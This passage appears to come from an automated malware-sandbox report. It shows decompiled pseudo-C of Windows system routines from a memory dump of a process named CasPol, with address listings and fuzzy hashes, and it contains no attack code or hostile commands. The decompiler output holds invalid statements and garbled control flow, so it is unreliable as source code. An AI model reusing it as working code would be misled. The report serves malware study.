									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0166F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0163FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x171b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0166B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                0x01655142
                                                                0x0165514c
                                                                0x01655150
                                                                0x01655157
                                                                0x01655159
                                                                0x0165515e
                                                                0x01655165
                                                                0x01655169
                                                                0x0165516c
                                                                0x01655172
                                                                0x01655176
                                                                0x0165517a
                                                                0x0165517a
                                                                0x0165517a
                                                                0x0165517f
                                                                0x01696d8b
                                                                0x01696d8e
                                                                0x01696d91
                                                                0x01696d95
                                                                0x01696d98
                                                                0x01696d9c
                                                                0x01696da0
                                                                0x01696da3
                                                                0x01696da7
                                                                0x01696e26
                                                                0x01696e26
                                                                0x01696e2a
                                                                0x016551f9
                                                                0x016551f9
                                                                0x016551fe
                                                                0x01696e33
                                                                0x01696e33
                                                                0x01696e39
                                                                0x01696e3d
                                                                0x01696e46
                                                                0x01696e50
                                                                0x00000000
                                                                0x00000000
                                                                0x01696e52
                                                                0x01696e53
                                                                0x01696e56
                                                                0x01696e5d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01696e5f
                                                                0x01696e67
                                                                0x01696e77
                                                                0x01696e7f
                                                                0x01696e80
                                                                0x01696e88
                                                                0x01696e90
                                                                0x01696e9f
                                                                0x01696ea5
                                                                0x01696ea9
                                                                0x01696eb1
                                                                0x01696ebf
                                                                0x00000000
                                                                0x00000000
                                                                0x01696ecf
                                                                0x01696ed3
                                                                0x00000000
                                                                0x00000000
                                                                0x01696edb
                                                                0x01696ede
                                                                0x01696ee1
                                                                0x01696ee8
                                                                0x01696eeb
                                                                0x01696eed
                                                                0x01696ef0
                                                                0x01696ef4
                                                                0x01696ef8
                                                                0x01696efc
                                                                0x00000000
                                                                0x00000000
                                                                0x01696f0d
                                                                0x01696f11
                                                                0x01696f32
                                                                0x01696f37
                                                                0x01696f3b
                                                                0x01696f3e
                                                                0x01696f41
                                                                0x01696f46
                                                                0x00000000
                                                                0x00000000
                                                                0x01696f4c
                                                                0x01696f50
                                                                0x01696f50
                                                                0x01696f54
                                                                0x01696f62
                                                                0x01696f65
                                                                0x01696f6d
                                                                0x01696f7b
                                                                0x01696f7b
                                                                0x01696f93
                                                                0x01696f98
                                                                0x01696fa0
                                                                0x01696fa6
                                                                0x01696fb3
                                                                0x01696fb6
                                                                0x01696fbf
                                                                0x01696fc1
                                                                0x01696fd5
                                                                0x01696fda
                                                                0x01696fda
                                                                0x01696fdd
                                                                0x01696fe2
                                                                0x01696fe7
                                                                0x01696feb
                                                                0x01696fef
                                                                0x01696ff3
                                                                0x0165520c
                                                                0x0165520c
                                                                0x0165520f
                                                                0x01655215
                                                                0x01655234
                                                                0x0165523a
                                                                0x0165523a
                                                                0x01655244
                                                                0x01655245
                                                                0x01655246
                                                                0x01655251
                                                                0x01655251
                                                                0x01696f13
                                                                0x01696f17
                                                                0x01696f17
                                                                0x01696f18
                                                                0x01696f1b
                                                                0x01696f1f
                                                                0x01696f23
                                                                0x00000000
                                                                0x01696f28
                                                                0x01655204
                                                                0x01655204
                                                                0x01655208
                                                                0x00000000
                                                                0x01655208
                                                                0x01655185
                                                                0x01655188
                                                                0x0165518a
                                                                0x0165518e
                                                                0x01655195
                                                                0x01696db1
                                                                0x01696db5
                                                                0x01696db9
                                                                0x0165519b
                                                                0x0165519b
                                                                0x0165519e
                                                                0x016551a7
                                                                0x016551a9
                                                                0x016551a9
                                                                0x016551b5
                                                                0x016551b8
                                                                0x016551bb
                                                                0x016551be
                                                                0x016551c1
                                                                0x016551c5
                                                                0x016551c9
                                                                0x016551cd
                                                                0x016551cd
                                                                0x016551d8
                                                                0x016551dc
                                                                0x016551e0
                                                                0x01696dcc
                                                                0x01696dd0
                                                                0x01696dd5
                                                                0x01696ddd
                                                                0x01696de1
                                                                0x01696de1
                                                                0x01696de5
                                                                0x01696deb
                                                                0x01696df1
                                                                0x01696df7
                                                                0x01696dfd
                                                                0x01696e01
                                                                0x01696e05
                                                                0x01696e09
                                                                0x01696e0d
                                                                0x01696e11
                                                                0x01696e11
                                                                0x016551eb
                                                                0x01696e1a
                                                                0x01696e1f
                                                                0x01696e21
                                                                0x01696e23
                                                                0x00000000
                                                                0x016551f1
                                                                0x016551f1
                                                                0x00000000
                                                                0x016551f1

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 057adf4452c98c57417b0e2225367bcd35d053d379178a882dc84130a90e0c1a
                                                                • Instruction ID: ec69cb211479a199d8f05a1cd857bcf5bcc93c6cd884b3b7ea9c23aefe07e3fe
                                                                • Opcode Fuzzy Hash: 057adf4452c98c57417b0e2225367bcd35d053d379178a882dc84130a90e0c1a
                                                                • Instruction Fuzzy Hash: 54C113755083818FD755CF28C980A5AFBF1BF88304F148A6EF99A8B362D771E945CB42
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016503E2 Relevance: .3, Instructions: 254COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 74%
                                                                			E016503E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x171d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01650548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0166B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0163B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1717c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01647D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01647D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E016A7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01669830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E016A69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1717c04 != 0) {
						_t118 = _v12;
						_t120 = E016AA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1717bd8;
						if( *0x1717bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E016695D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E016699A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E016A3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0162B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0166AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1718474 - 3;
										if( *0x1718474 != 3) {
											 *0x17179dc =  *0x17179dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01647D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01647D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E016A7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1718708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1717b00; // 0x0
							asm("ror esi, cl");
							 *0x171b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E016695D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E01637F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                0x016503f1
                                                                0x016503f7
                                                                0x016503f9
                                                                0x016503fb
                                                                0x016503fd
                                                                0x01650400
                                                                0x0165040a
                                                                0x01694c7a
                                                                0x01650537
                                                                0x01650547
                                                                0x01650410
                                                                0x01650410
                                                                0x01650414
                                                                0x01650417
                                                                0x0165041a
                                                                0x01650421
                                                                0x01650424
                                                                0x0165042b
                                                                0x0165043b
                                                                0x0165043e
                                                                0x0165043f
                                                                0x0165043f
                                                                0x01650446
                                                                0x01650449
                                                                0x0165044c
                                                                0x0165044f
                                                                0x01650459
                                                                0x01694c8d
                                                                0x0165045f
                                                                0x0165045f
                                                                0x0165045f
                                                                0x01650467
                                                                0x01694c97
                                                                0x01694c9d
                                                                0x01694ca4
                                                                0x01694caa
                                                                0x01694caf
                                                                0x01694cb1
                                                                0x01694cc3
                                                                0x01694cb3
                                                                0x01694cbc
                                                                0x01694cbc
                                                                0x01694cc8
                                                                0x01694ccb
                                                                0x01694cd7
                                                                0x01694cda
                                                                0x01694cdf
                                                                0x01694cdf
                                                                0x01694ccb
                                                                0x01694ca4
                                                                0x0165046d
                                                                0x0165046f
                                                                0x0165046f
                                                                0x01650471
                                                                0x01650476
                                                                0x0165047a
                                                                0x0165047b
                                                                0x01650483
                                                                0x01650489
                                                                0x0165048d
                                                                0x00000000
                                                                0x00000000
                                                                0x01694ce9
                                                                0x01694cef
                                                                0x01694d22
                                                                0x01694d22
                                                                0x00000000
                                                                0x01694d22
                                                                0x01694cf1
                                                                0x01694cf7
                                                                0x00000000
                                                                0x00000000
                                                                0x01694cf9
                                                                0x01694cff
                                                                0x00000000
                                                                0x00000000
                                                                0x01694d05
                                                                0x01694d07
                                                                0x00000000
                                                                0x00000000
                                                                0x01694d0d
                                                                0x01694d0f
                                                                0x01694d14
                                                                0x01694d16
                                                                0x00000000
                                                                0x00000000
                                                                0x01694d1c
                                                                0x01694d1c
                                                                0x01650499
                                                                0x01650535
                                                                0x01650535
                                                                0x00000000
                                                                0x01650535
                                                                0x016504a6
                                                                0x01694d2c
                                                                0x01694d37
                                                                0x01694d39
                                                                0x01694d3b
                                                                0x00000000
                                                                0x00000000
                                                                0x01694d41
                                                                0x01694d48
                                                                0x01650527
                                                                0x0165052b
                                                                0x0165052d
                                                                0x01650530
                                                                0x01650530
                                                                0x00000000
                                                                0x0165052b
                                                                0x01694d4e
                                                                0x016504ac
                                                                0x016504ac
                                                                0x016504af
                                                                0x016504b2
                                                                0x016504b7
                                                                0x016504b9
                                                                0x016504bb
                                                                0x016504bd
                                                                0x016504bf
                                                                0x016504c5
                                                                0x016504c9
                                                                0x01694d53
                                                                0x01694d59
                                                                0x01694db9
                                                                0x01694dba
                                                                0x01694dbf
                                                                0x01694dc2
                                                                0x01694dc4
                                                                0x01694dc7
                                                                0x01694dce
                                                                0x00000000
                                                                0x01694dce
                                                                0x01694d5b
                                                                0x01694d61
                                                                0x00000000
                                                                0x00000000
                                                                0x01694d63
                                                                0x01694d69
                                                                0x00000000
                                                                0x00000000
                                                                0x01694d6b
                                                                0x01694d6e
                                                                0x01694d74
                                                                0x01694d76
                                                                0x01694d7c
                                                                0x01694d7e
                                                                0x01694d84
                                                                0x01694d89
                                                                0x01694d8c
                                                                0x01694d8d
                                                                0x01694d92
                                                                0x01694d95
                                                                0x01694d96
                                                                0x01694d98
                                                                0x01694d9a
                                                                0x01694d9f
                                                                0x01694da4
                                                                0x01694da6
                                                                0x01694da8
                                                                0x01694daf
                                                                0x01694db1
                                                                0x01694db1
                                                                0x01694daf
                                                                0x01694da6
                                                                0x01694d84
                                                                0x01694d7c
                                                                0x00000000
                                                                0x01694d74
                                                                0x016504d6
                                                                0x01694de1
                                                                0x016504dc
                                                                0x016504dc
                                                                0x016504dc
                                                                0x016504e4
                                                                0x01694deb
                                                                0x01694df1
                                                                0x01694df8
                                                                0x01694dfe
                                                                0x01694e03
                                                                0x01694e05
                                                                0x01694e17
                                                                0x01694e07
                                                                0x01694e10
                                                                0x01694e10
                                                                0x01694e1c
                                                                0x01694e1f
                                                                0x01694e35
                                                                0x01694e35
                                                                0x01694e1f
                                                                0x01694df8
                                                                0x016504f1
                                                                0x016504fa
                                                                0x01694e3f
                                                                0x01694e47
                                                                0x01694e5b
                                                                0x01694e61
                                                                0x01694e67
                                                                0x01694e69
                                                                0x01694e71
                                                                0x01694e73
                                                                0x01650500
                                                                0x01650500
                                                                0x01650500
                                                                0x016504fa
                                                                0x01650508
                                                                0x0165051d
                                                                0x0165051d
                                                                0x0165051f
                                                                0x01650524
                                                                0x00000000
                                                                0x01650524
                                                                0x01650515
                                                                0x01650517
                                                                0x01694e7a
                                                                0x01694e7c
                                                                0x00000000
                                                                0x00000000
                                                                0x01694e85
                                                                0x00000000
                                                                0x01694e85
                                                                0x00000000
                                                                0x01650517

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 38cc3e8da8a100694d577ee98a1dd68d9caa1d6d3be0c7cbcd01c2eb264795d3
                                                                • Instruction ID: a248b0550df47f67fdf1be500bc9e62cce20075a9eebb5429fec8f84360c4775
                                                                • Opcode Fuzzy Hash: 38cc3e8da8a100694d577ee98a1dd68d9caa1d6d3be0c7cbcd01c2eb264795d3
                                                                • Instruction Fuzzy Hash: BD910132E00615EFEF329A6CCE44BAD7BA9AB05724F050265FE10AB2D1DB74DD02C785
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165EBB0 Relevance: .2, Instructions: 250COMMONLIBRARYCODECrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0165EBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E0165ED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}































                                                                0x0165ebb8
                                                                0x0165ebbf
                                                                0x0165ebc1
                                                                0x0165ebc6
                                                                0x00000000
                                                                0x0169b6d6
                                                                0x0165ebcd
                                                                0x0165ebd2
                                                                0x0165ec95
                                                                0x0169b6e0
                                                                0x0165ec9b
                                                                0x0165eca1
                                                                0x0165eca1
                                                                0x0165ec89
                                                                0x00000000
                                                                0x0165ec89
                                                                0x0165ebd8
                                                                0x0165ebdd
                                                                0x0169b6ea
                                                                0x00000000
                                                                0x0165ebe3
                                                                0x0165ebe5
                                                                0x0165ebe7
                                                                0x0165ebef
                                                                0x0165ebf2
                                                                0x00000000
                                                                0x0165ebf5
                                                                0x00000000
                                                                0x0165ebf5
                                                                0x0165ebf5
                                                                0x0165ebf7
                                                                0x0169b6f6
                                                                0x0165ec7c
                                                                0x0165ec7c
                                                                0x0165ec7f
                                                                0x0165ec82
                                                                0x0165ec87
                                                                0x00000000
                                                                0x0165ec87
                                                                0x0165ec1a
                                                                0x0165ec1a
                                                                0x0165ec25
                                                                0x0169b725
                                                                0x0169b72c
                                                                0x0169b72c
                                                                0x0165ec2d
                                                                0x0165ec31
                                                                0x0169b73c
                                                                0x0169b744
                                                                0x0169b748
                                                                0x0169b748
                                                                0x0169b749
                                                                0x0169b749
                                                                0x0169b74a
                                                                0x0169b74a
                                                                0x0165ec3e
                                                                0x0169b860
                                                                0x00000000
                                                                0x0165ec44
                                                                0x0165ec47
                                                                0x0169b750
                                                                0x0169b758
                                                                0x0169b767
                                                                0x0169b775
                                                                0x0169b77c
                                                                0x0169b77f
                                                                0x0169b769
                                                                0x0169b76c
                                                                0x0169b76c
                                                                0x0169b781
                                                                0x0169b788
                                                                0x0169b78b
                                                                0x0169b75a
                                                                0x0169b75d
                                                                0x0169b75d
                                                                0x0169b78d
                                                                0x0169b792
                                                                0x0169b793
                                                                0x0169b793
                                                                0x0165ec54
                                                                0x0165ec56
                                                                0x0165ec57
                                                                0x0165ec59
                                                                0x0165ec5e
                                                                0x0165ecaa
                                                                0x0165ed16
                                                                0x0165ed16
                                                                0x0165ecac
                                                                0x0165ecaf
                                                                0x0165ecb4
                                                                0x0165ecb6
                                                                0x0165ecb6
                                                                0x0165ecb9
                                                                0x0165ecbf
                                                                0x0169b7c1
                                                                0x0169b7c8
                                                                0x0169b7d3
                                                                0x0169b7db
                                                                0x0169b7ec
                                                                0x0169b858
                                                                0x00000000
                                                                0x0169b858
                                                                0x0169b7ee
                                                                0x0169b7f1
                                                                0x0169b7f4
                                                                0x0169b7ff
                                                                0x0169b850
                                                                0x00000000
                                                                0x0169b850
                                                                0x0169b80a
                                                                0x0169b813
                                                                0x0169b81c
                                                                0x0169b81d
                                                                0x0169b822
                                                                0x0169b825
                                                                0x0169b828
                                                                0x0169b831
                                                                0x0169b832
                                                                0x0169b837
                                                                0x0169b840
                                                                0x0169b842
                                                                0x0169b845
                                                                0x0169b848
                                                                0x00000000
                                                                0x0169b848
                                                                0x0169b7df
                                                                0x00000000
                                                                0x0169b7df
                                                                0x0169b7cc
                                                                0x00000000
                                                                0x0169b7cc
                                                                0x0165ecc5
                                                                0x0165ecc7
                                                                0x0165eccb
                                                                0x0169b79b
                                                                0x0169b79e
                                                                0x0169b7a4
                                                                0x00000000
                                                                0x00000000
                                                                0x0169b7a6
                                                                0x0169b7a8
                                                                0x0169b7a8
                                                                0x0165ecd3
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
